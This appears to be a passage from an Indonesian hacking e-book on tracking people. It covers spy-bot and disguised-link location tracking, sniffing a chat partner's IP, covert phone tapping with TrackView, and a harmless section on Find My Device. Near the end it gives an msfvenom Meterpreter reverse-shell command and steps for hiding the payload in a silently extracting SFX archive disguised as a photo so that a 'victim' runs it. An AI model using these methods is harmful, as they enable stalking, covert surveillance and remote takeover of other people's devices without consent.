5. Contoh /create RasiTech
6. Kalo sudah kaya gini saatnya membuat link pelacakan
7. Ketik /spy URL
8. Contohnya kaya gini /spy [Link]
9. Link Pelacakan akan di buat sama bot dan hasil akan mucul di bot Camera +
Location
10. Selamat Mencoba :D

[Link] Mengirim Via Dokumen

1. Cara ini cukup mudah kok kalian hanya perlu membuat link pelacakan menggunakan
grabify atau lainnya
2. Buat file html dan masukan script ini

<!DOCTYPE html>
<html>
<head>
<script>
[Link] = "Link Pelacakan";
</script>
</head>
</html>

3. Seperti ini contohnya

<!DOCTYPE html>
<html>
<head>
<script>
[Link] = "[Link]
</script>
</head>
</html>

4. Lalu kalian save dengan nama yang mirip seperti gambar. Contohnya
[Link]
5. Kalian tinggal Share ke Aplikasi Chat seperti WhatsApp
6. Mudah kan :D

1.3.3 Menggunakan Network Sniffer


[Link] Apa itu Network Sniffer?

Penganalisa paket (Packet analyzer)


Sniffer Paket yang juga dikenal sebagai Network Analyzers atau Ethernet Sniffer ialah
sebuah aplikasi yang dapat melihat lalu lintas data pada jaringan
[Link] Melacak dengan Software Network Sniffer
[Link].1 Instalasi & Penggunaan Network Sniffer

1. Untuk tutorial kali ini kita akan menggunakan software Wireshark karena lebih mudah
2. Kalian download dulu di sini
3. Kalo sudah di download kalian jalankan Software Wireshark nya
4. Sebelum kalian menyalakan Wiresharknya kalian harus tau IP Public dan IP local
kalian terlebih dahulu dengan cara Ifconfig Buat Linux dan Ipconfig Buat Windows
5. Lalu saatnya kalian start dan silahkan chatting
6. Kalo korban sudah mengirim pesan buka Wiresharknya dan stop prosesnya
7. Lalu tinggal kalian cari ip korban bukan ip web, ip local kita atau ip public kita

[Link] Melacak dengan Software Network Sniffer


[Link].1 Cara memasang Extension Network Sniffer

1. Download melalui link di bawah


Chrome 1
Chrome 2
Mozilla 1
Mozilla 2
2. Sebelum kalian menyalakan Extension Network Sniffer nya kalian harus tau IP Public
dan IP local kalian terlebih dahulu dengan cara Ifconfig Buat Linux dan Ipconfig
Buat Windows
3. Lalu saatnya kalian start dan silahkan chatting
4. Kalo korban sudah mengirim pesan buka Wiresharknya dan stop prosesnya
5. Lalu tinggal kalian cari ip korban bukan ip web, ip local kita atau ip public kita
1.3.4 Menggunakan Email
[Link] Melacak menggunakan Aplikasi Find My
Device
[Link].1 Apa itu Aplikasi Find My Device

Find My Device adalah aplikasi buatan google yang dimana kita bisa melacak keberadaan
ponsel kita hanya dengan email walau tanpa harus mempunyai aplikasinya.

[Link].2 Cara penggunaan Aplikasi Find My Device

Dengan Android
Pemilik dapat menggunakan ponsel cadangan atau ponsel teman untuk menggunakan
aplikasi ini. Yang perlu dipersiapkan, akun Google pemilik harus sama persis dengan akun
Google yang terdaftar di ponsel yang hilang.

Cara memulai menggunakan aplikasi Find My Device di smartphone sebagai berikut:

- Buka Play Store

- Unduh dan install aplikasi Find My Device

- Jalankan aplikasi Find My Device

- Masukkan akun Google yang digunakan di perangkat atau smartphone Android yang
hilang

Setelah berhasil login, maka tampilan akan dialihkan menuju tampilan lokasi atau maps,
selain itu terdapat beberapa opsi yang dapat dipilih pemilik untuk mengamankan posisi
smartphone jika ponsel dipastikan hilang di tempat publik.

Setidaknya ada tiga pilihan yang dapat digunakan yakni sebagai berikut:
- Play sound atau bunyikan ringtone, opsi ini dapat menunjukkan lokasi ponsel yang hilang
secara cepat. Ponsel android pemilik akan bergetar dan berdering dengan volume
maksimum hingga lima menit.

Caranya hanya tinggal pilih fitur play sound, otomatis ponsel akan berdering sehingga
pemilik mudah mengetahui lokasi ponsel. Pemilik juga dapat menyetop ponsel berdering
dengan memilih tombol stop sound

- Lock atau mengunci ponsel, opsi ini akan membuat ponsel pemilik yang hilang terkunci
secara otomatis. Langkah ini dapat mencegah hak akses seorang yang menemukan ponsel
pemilik.

Caranya pilih opsi lock > masukkan kata sandi baru dua kali > input nomor yang dapat
dihubungi saat ponsel ditemukan

- Erase atau menghapus, opsi ini memungkinkan pengguna untuk menghapus semua data
secara manual dari Find My Device. Saat pemilik memilih fitur ini, maka secara otomatis
akan data yang terdapat di smartphone akan terhapus, mulai foto, video hingga aplikasi.
Namun jika kondisi ponsel dalam keadaan mati, fitur erase akan berfungsi usai ponsel
dihidupkan kembali.

Caranya hanya tinggal pilih fitur erase. Namun yang perlu diingat, ketika pemilik memilih fitur
ini, maka data akan terhapus secara permanen.

Dengan komputer / Laptop

Selain menggunakan smartphone, pemilik smartphone yang hilang dapat menggunakan fitur
ini untuk melacak posisi terakhir smartphone yang hilang. Berikut ini cara menggunakan
Find My Device melalui PC atau notebook.

- Buka browser dari PC

- Buka situs [Link]

- Masukkan akun Google yang digunakan di perangkat atau smartphone Android yang
hilang
Setelah berhasil login, maka tampilan akan dialihkan menuju tampilan lokasi atau maps
yang menunjukkan lokasi dimana smartphone Android terakhir diletakkan, lengkap dengan
daya baterai yang bertahan, hingga kapan smartphone tersebut terakhir dinyalakan.

Selain android, pengguna smartphone iPhone atau iOS yang mengalami kehilangan
smartphone juga dapat menikmati fasilitas Find My iPhone. Untungnya, iPhone secara
khusus memfasilitasi penggunanya menggunakan fitur ini secara gratis dan mudah dari
pengembang Apple.

Dengan iPhone

- Buka menu setting di smartphone

- Klik ID Apple, jika belum sign in maka selesaikan alurnya

- Pilih menu Find My > klik Find My iPhone > aktifkan atau geser Find My iPhone ke posisi
ON. Fitur ini memungkinkan pemilik menemukan lokasi iPhone melalui perangkat lain

- Geser fitur "Send Last Location" ke posisi ON

- Buka Find My iPhone pada smartphone iPhone lain

- Masukkan ID Apple yang digunakan di perangkat atau smartphone iPhone yang hilang

Mirip dengan pengaturan Android, setelah berhasil login, maka tampilan akan dialihkan
menuju tampilan lokasi atau maps, selain itu terdapat beberapa opsi yang dapat dipilih
pemilik untuk mengamankan posisi smartphone jika ponsel dipastikan hilang di tempat
publik. Setidaknya ada tiga pilihan yang dapat digunakan yakni sebagai berikut:

- Play sound atau bunyikan ringtone, fitur tombol ini berada di pojok kiri bawah layar. Jika
perangkat iPhone masih berada di sekitar, maka pemilik dapat mengklik fitur tersebut untuk
mempermudah pencarian.

- Lost Mode, pemilik dapat memilih menggunakan pilihan ini jika merasa iPhone ditemukan
oleh orang lain atau dicuri oleh orang lain.

Caranya masukkan kode kunci smartphone > masukkan serangkaian nomor acak yang tidak
berkaitan, seperti jangan gunakan nomor ponsel. Jika iPhone masih hidup atau terhubung
dengan jaringan internet, maka iPhone pemilik akan terkunci otomatis dan tidak bisa diatur
ulang tanpa kode kunci tadi, sehingga pemilik dapat mengetahui lokasi terakhir iPhone.

Namun jika kondisi iPhone mati atau tidak tersambung dengan jaringan internet, maka
pemilik dapat mendapatkan notifikasi melalui email yang persis dengan email terdaftar ID
Apple, sehingga pemilik dapat melacak kondisi terakhir iPhone. Fitur Find My iPhone ini juga
dapat dijalankan di smartphone iPhone maupun personal computer (PC).

- Erase iPhone, pemilik dapat menggunakan opsi ini jika khawatir tidak dapat menemukan
kembali iPhone dan khawatir data di dalam smartphone akan disalahgunakan penemu.
Artinya data yang tersimpan di iPhone akan dihapus secara permanen.

Dengan Macbook

Selain menggunakan smartphone, pemilik iPhone yang hilang dapat menggunakan fitur ini
untuk melacak posisi terakhir smartphone yang hilang. Berikut cara menggunakan Find My
iPhone melalui PC atau notebook.

- Buka browser dari PC

- Buka situs [Link]

- Masukkan ID Apple dan kata sandi yang digunakan di perangkat atau smartphone iPhone
yang hilang

- Klik all device > pilih perangkat iPhone yang hilang

Setelah berhasil login, maka tampilan akan dialihkan menuju tampilan lokasi atau maps
yang menunjukkan lokasi smartphone iPhone terakhir diletakkan. Lengkap dengan daya
baterai yang bertahan, hingga kapan smartphone tersebut terakhir dinyalakan.

Cara-cara tersebut mempermudah pengguna smartphone masa kini ketika dibingungkan


dengan kondisi kehilangan smartphone atau lupa menaruhnya. Selain itu, aplikasi Find My
Device dinilai efektif untuk mencegah penyalahgunaan data ketika smartphone yang hilang
sampai di tangan kedua atau pencuri.
[Link] Apa itu Aplikasi TrackView

Aplikasi TrackView merupakan salah satu aplikasi pelacak yang dapat mengakses kamera
pada smartphone. Dengan menggunakan aplikasi ini, para pengguna dapat mengakses atau
menyadap smartphone orang lain secara diam-diam.

Selain itu, dengan mengetahui cara pakai aplikasi TrackView, pengguna juga dapat
mengakses pesan, kamera selfie, serta mikrofon yang ada pada smartphone. TrackView
merupakan salah satu aplikasi serba guna yang dapat anda gunakan untuk melacak posisi
seseorang.

Selain itu, dengan aplikasi ini, anda dapat memantau aktivitas orang tersebut dari ponsel
yang anda gunakan kapan dan dimana saja selama orang tersebut terkoneksi pada jaringan
internet.

Beberapa fungsi umum yang dapat anda peroleh dengan menggunakan aplikasi ini adalah
dapat mengaktifkan video call, telepon berdering, hingga dapat melakukan komunikasi
dengan beberapa orang dalam waktu yang sama.

Salah satu cara pakai aplikasi TrackView adalah dapat anda gunakan untuk memantau
aktivitas anak anda. Dengan demikian, anak dapat terkontrol secara lebih baik.

Fitur dan Kelebihan Aplikasi TrackView

Aplikasi TrackView dapat menjadi alternatif atau solusi tepat bagi anda yang akan
melakukan pengawasan terhadap seseorang. Aplikasi ini memiliki beberapa fitur serta
kelebihan yang antara lain merupakan aplikasi penyadapan bersifat gratis.

Untuk memperoleh fitur komplit, anda dapat upgrade ke TrackView Premium. Cara pakai
aplikasi TrackView cukup mudah, hanya dengan menggunakan akun Gmail untuk login ke
dalamnya. Selain itu, dalam aplikasi ini tersedia fitur menu utama, yakni akses kamera dan
lokasi.

Meskipun ponsel dalam keadaan terkunci, anda tetap dapat mengakses kamera.
Menariknya lagi, pada saat seseorang sedang bermain game pada smartphone, masih
dapat mengakses kamera dengan mudah.
[Link] Cara Penggunaan Aplikasi TrackView

Cara pakai aplikasi TrackView pada perangkat Android cukup mudah dilakukan. Dengan
menggunakan aplikasi ini, anda dapat mengakses atau menyadap smartphone orang lain
secara diam-diam. Dalam beberapa waktu belakangan ini, aplikasi Trackview cukup viral
pada berbagai media sosial.

Dalam media sosial tersebut menyebutkan bahwa kita dapat dengan mudah untuk
melakukan pengawasan, memantau pacar, atau beberapa hal lain menggunakan aplikasi
yang terdapat pada Android. Aplikasi tersebut bernama TrackView yang dapat dengan
mudah anda download pada Google Play Store.

Cara Pakai Aplikasi TrackView

Perkembangan teknologi komunikasi saat ini cukup pesat. Salah satunya dengan kegunaan
dari smartphone Android yang selalu menghadirkan sesuatu yang baru dalam setiap
waktunya.

Hal ini terbukti dengan selalu hadirnya aplikasi pada Play Store yang cukup menarik untuk
digunakan. Mulai dari aplikasi sosial media, aplikasi penghasil uang, dan aplikasi belajar
online.

Menariknya lagi, saat ini telah hadir aplikasi berbau privasi dalam hal penyadapan yang juga
terdapat dalam layanan tersebut.

Salah satu aplikasi Android yang dapat anda gunakan untuk menyadap atau memata-matai
ponsel orang lain dari jarak jauh yang hanya dalam beberapa pengaturan saja. Aplikasi
tersebut bernama aplikasi TrackView

Cara Menggunakan Aplikasi TrackView

Dalam menggunakan aplikasi TrackView, anda perlu menyiapkan 2 buah ponsel. Untuk
ponsel yang pertama adalah sebagai ponsel pengontrol. Sedangkan pada ponsel kedua
berfungsi sebagai hp korban atau orang yang akan anda sadap.

Pastikan kedua ponsel tersebut telah sama-sama terinstal aplikasi TrackView. Berikut ini
cara pakai aplikasi TrackView untuk mengamati orang yang anda tuju.
1. Langkah pertama yang harus anda lakukan adalah download aplikasi TrackView
pada smartphone anda
2. Selanjutnya, jalankan aplikasi TrackView pada ponsel dengan login menggunakan
akun Gmail yang sama antara kedua ponsel yang akan anda gunakan.
3. Pada halaman utama aplikasi, akan terdapat tiga tombol dengan menu utama pada
bagian atas yang terdiri dari akses kamera, akses lokasi, serta pengaturan options.
4. Kemudian klik tombol kamera, maka anda dapat akses kamera ponsel lain. Anda
juga dapat mengatur dengan menggunakan kamera depan atau belakang
5. Cara selanjutnya adalah dengan klik tombol lokasi. Maka akan tampak tempat lokasi
dari user smartphonenya. Antara ponsel yang satu dan smartphone yang lainnya
sama-sama dapat mengakses lokasi.

Cara pakai aplikasi TrackView ini akan berhasil jika kedua ponsel tetap dalam keadaan
paket data aktif. Namun apabila koneksi internet terputus, maka proses penyadapan pada
hp korban tidak dapat anda lakukan.

1.3.5 Menggunakan Nomor HP


[Link] Melacak menggunakan Tools HLR Lookup
[Link].1 Apa itu HLR Lookup?

Domain register adalah Daerah Asal dimana kartu kamu dapat diaktifkan dan biasanya
operator seluler telah mengatur penyebaran kartu perdananya menurut HLR yang telah
ditentukan oleh mereka sesuai dengan prefix tertentu pada SIM Card kita.

[Link].2 Cara penggunaan HLR Lookup

Untuk tutorial kali ini kita akan gunakan Ceebydith. Apa itu Ceebydith?

Ceebydith adalah situs web yang menyediakan layanan untuk mengetahui home
location register (HLR) nomor ponsel. Cara ini bukan metode untuk melacak lokasi,
melainkan area asal nomor hp berdasarkan kode unik yang diatur oleh
masing-masing operator seluler.

Untuk cara penggunaanya juga mudah, kalian hanya perlu memasukan nomor
telefon yang ingin di lacak maka lokasi akan ditemukan.

[Link] Melacak menggunakan bantuan Operator

Cara ini cukup mudah namun kamu harus punya izin, mungkin jika temanmu bekerja di
peruusahaan operator kartu yang kamu miliki juga bisa kok, caranya tinggal menghubungi
pihak operator. Cuman operator aja? Enggak cuman operator orang lain seperti penyidik,
kepolisian, kejaksaan pun juga bisa namun untuk polisi harus membuat laporan terlebih
dahulu.

1.3.6 Menggunakan Gambar


[Link] Menggunakan Tools GeoImg

GeoImgr adalah alat web sederhana untuk foto geotagging. Foto JPG dapat berisi
informasi lokasi geografis yang disimpan di header EXIF ​file gambar.

Cara penggunaan tools ini sangatlah mudah, silahkan ikuti step2 ini

1. Bukan situs GeoImgr


2. Upload gambar dengan menekan tombol upload
3. Upload gambar yang telah di jepret orang tersebut
4. Tara lokasi foto jepretan berhasil di temukan
[Link] Melacak menggunakan payload gambar

Proses Pertama dalam exploit adalah membuat payload(virus) dengan memasukan perintah
:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Link] LPORT=4444 -f >
[Link]

Langkah selanjutnya adalah memasukan payload ke dalam foto dengan cara membuat
icon.
Gambar 1 : Upload gambar yang ingin dijadikan Icon.

Gambar 2 : Usahakan Foto yang ingin di jadikan Icon semenarik mungkin, agar korban
tertarik untuk membuka file tersebut.
Gambar 3 : Tentukan ukuran icon, jika sudah tekan tombol download untuk
mendownload icon.

Gambar 4 : Kemudian foto,payload,dan icon di jadikan 1 file dengan menggunakan RAR

Supaya file tidak dicurigai, gunakan langkah-langkah berikut :


Pada General settings
1. Pilih Create SFX archive,
2. Pilih Compression method dari Normal ke Best

Setelah itu pada pilihan Advanced, Pilih SFX options

Pada menu SFX option,arahkan kursor ke Setup. Kemudian pada kotak Run after extraction
ketikan nama foto dan nama payload.
Arahkan kursor ke Text and Icon, Pilih file icon yang sebelumnya sudah kita buat.

Arahkan kursor ke Models, pada silent mode, pilih Hide All.


Kemudian copykan exe tadi ke korban dan tunggu korban membuka file yang kita buat.
jika sudah maka akan muncul tampilan seperti di bawah :

Dan kita bisa melihat data-data pada laptop korban


SELESAI

1.4 Daftar Pustaka

Refrensi dari internet:


Pengenalan Metasploit. “[Link]
Apa itu Payload?. “[Link]
Apa itu RAT?. “[Link]
Apa itu Network Sniffer?. “[Link]
Apa itu HLR Lookup?.
“[Link]
1.5 Tentang Penulis
Nama lengkapnya adalah Rasi Adil Sejahtera, namun dia akrab di panggil Rasi Tech.
Keahliannya adalah di bidang IT. Udah itu aja ngab untuk umur dan lainnya tanya aja sendiri
wkwk :D.

Anda mungkin juga menyukai